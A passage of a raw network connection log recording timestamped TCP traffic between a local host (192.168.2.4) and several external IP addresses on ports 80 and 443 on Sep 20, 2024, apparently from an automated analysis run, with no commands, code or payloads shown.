Sep 20, 2024 11:08:02.020415068 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020433903 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020442963 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020459890 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020468950 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020479918 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020489931 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020507097 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020518064 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020524979 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020535946 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020554066 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020580053 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020601988 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020663023 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020678997 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020697117 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020709038 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020713091 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020729065 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020740986 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020766020 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020791054 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020827055 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020826101 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020827055 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020860910 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020875931 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020875931 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020905972 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020912886 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020924091 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020929098 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020946026 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020953894 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020962954 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.020992041 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.020992041 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021061897 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021089077 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021090984 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021106005 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021122932 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021135092 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021150112 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021156073 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021167994 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021176100 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021184921 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021195889 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021222115 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021239996 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021240950 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021240950 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021253109 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.021265030 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021285057 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.021301985 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025063992 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025079012 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025104046 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025121927 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025120974 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025140047 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025146008 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025146008 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025166035 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025171041 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025183916 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025190115 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025199890 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025207043 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025222063 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025227070 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025239944 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025245905 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025262117 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025275946 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025279999 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025290012 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025306940 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025321007 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025325060 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025341034 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025342941 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025360107 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025361061 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025383949 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025383949 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025388002 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025403023 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025432110 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025620937 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025635004 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025650978 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025671005 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025667906 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025687933 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025711060 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025711060 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025764942 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025780916 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025798082 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025815964 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025816917 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025815964 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025835991 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025835991 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025855064 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025860071 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025873899 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025876045 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025892973 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.025896072 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025913954 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.025940895 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.026031017 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.026046038 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.026077032 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.026108027 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.058075905 CEST	80	49762	147.45.44.104	192.168.2.4
Sep 20, 2024 11:08:02.058135986 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:02.245073080 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.245120049 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:02.249118090 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.249325037 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.249339104 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:02.908382893 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:02.908675909 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.908951998 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.908962011 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:02.911020041 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:02.911025047 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.528567076 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:03.528624058 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:03.528691053 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:03.530914068 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:03.530930996 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:03.823452950 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.823523045 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.823539019 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.823551893 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.823580980 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.823604107 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.823741913 CEST	49763	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.823755980 CEST	443	49763	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.825026035 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.825059891 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:03.825167894 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.825406075 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:03.825423956 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:04.020837069 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.020965099 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.022716045 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.022742987 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.023081064 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.066797018 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.066838980 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.066946030 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.471364021 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.471481085 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.471621037 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.476864100 CEST	49764	443	192.168.2.4	172.67.204.62
Sep 20, 2024 11:08:04.476900101 CEST	443	49764	172.67.204.62	192.168.2.4
Sep 20, 2024 11:08:04.497627020 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.497661114 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:04.497745991 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.498228073 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.498241901 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:04.516042948 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:04.516344070 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:04.516747952 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:04.516753912 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:04.519009113 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:04.519015074 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:04.976337910 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:04.976490021 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.978176117 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.978207111 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:04.978754997 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:04.980057001 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.980101109 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:04.980164051 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:05.249254942 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:05.249309063 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:05.249321938 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:05.249346972 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:05.249356031 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:05.249386072 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:05.249696016 CEST	49765	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:08:05.249712944 CEST	443	49765	116.203.165.127	192.168.2.4
Sep 20, 2024 11:08:05.318321943 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.323231936 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.323405027 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.323455095 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.323470116 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.328351974 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.328387976 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.328396082 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.328403950 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.328525066 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.328572035 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.439023972 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:05.439110041 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:05.439192057 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:05.439398050 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:05.439418077 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:05.439434052 CEST	49766	443	192.168.2.4	104.21.88.61
Sep 20, 2024 11:08:05.439439058 CEST	443	49766	104.21.88.61	192.168.2.4
Sep 20, 2024 11:08:05.455347061 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.455410957 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.455497980 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.455816984 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.455838919 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.923829079 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.923935890 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.925462008 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.925471067 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.925784111 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.926985979 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.927020073 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:05.927495956 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:05.990606070 CEST	80	49767	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.990808010 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.993891954 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.993937016 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:05.994014978 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.994366884 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:05.994383097 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:06.347069025 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.347187042 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.347269058 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.347438097 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.347465992 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.347490072 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.347501993 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.364665985 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.364700079 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.364748001 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.365102053 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.365113974 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.707679033 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:06.707895041 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:06.712409019 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:06.712419033 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:06.712675095 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:06.712830067 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:06.713223934 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:06.759407997 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:06.866480112 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.866597891 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.868153095 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.868165970 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.868494987 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:06.894913912 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.894936085 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:06.895032883 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.095628023 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:07.095761061 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:07.095771074 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:07.095818996 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:07.095865965 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:07.095887899 CEST	443	49769	45.132.206.251	192.168.2.4
Sep 20, 2024 11:08:07.095901966 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:07.095935106 CEST	49769	443	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:07.321314096 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.321425915 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.321471930 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.321634054 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.321655035 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.321664095 CEST	49770	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.321669102 CEST	443	49770	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.340703011 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.340755939 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.340811968 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.341131926 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.341146946 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.812434912 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.812546968 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.814300060 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.814327002 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.814704895 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:07.816030025 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.816052914 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:07.816118002 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:08.236908913 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:08.237169981 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:08.237237930 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:08.237379074 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:08.237415075 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:08.237442017 CEST	49771	443	192.168.2.4	188.114.97.3
Sep 20, 2024 11:08:08.237457037 CEST	443	49771	188.114.97.3	192.168.2.4
Sep 20, 2024 11:08:08.253746986 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.253796101 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:08.253896952 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.254204988 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.254220963 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:08.755764961 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:08.755832911 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.757512093 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.757523060 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:08.757914066 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:08.759468079 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.759485006 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:08.759582996 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:09.366344929 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:09.366452932 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:09.366493940 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:09.366583109 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:09.366600037 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:09.366611958 CEST	49772	443	192.168.2.4	104.21.75.242
Sep 20, 2024 11:08:09.366617918 CEST	443	49772	104.21.75.242	192.168.2.4
Sep 20, 2024 11:08:09.385816097 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.385858059 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:09.385930061 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.386225939 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.386236906 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:09.856559992 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:09.856668949 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.858263016 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.858292103 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:09.858711958 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:09.860042095 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.860071898 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:09.860138893 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.276827097 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.276943922 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.277010918 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.277240992 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.277240992 CEST	49773	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.277261019 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.277271986 CEST	443	49773	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.296188116 CEST	49774	443	192.168.2.4	188.114.96.3
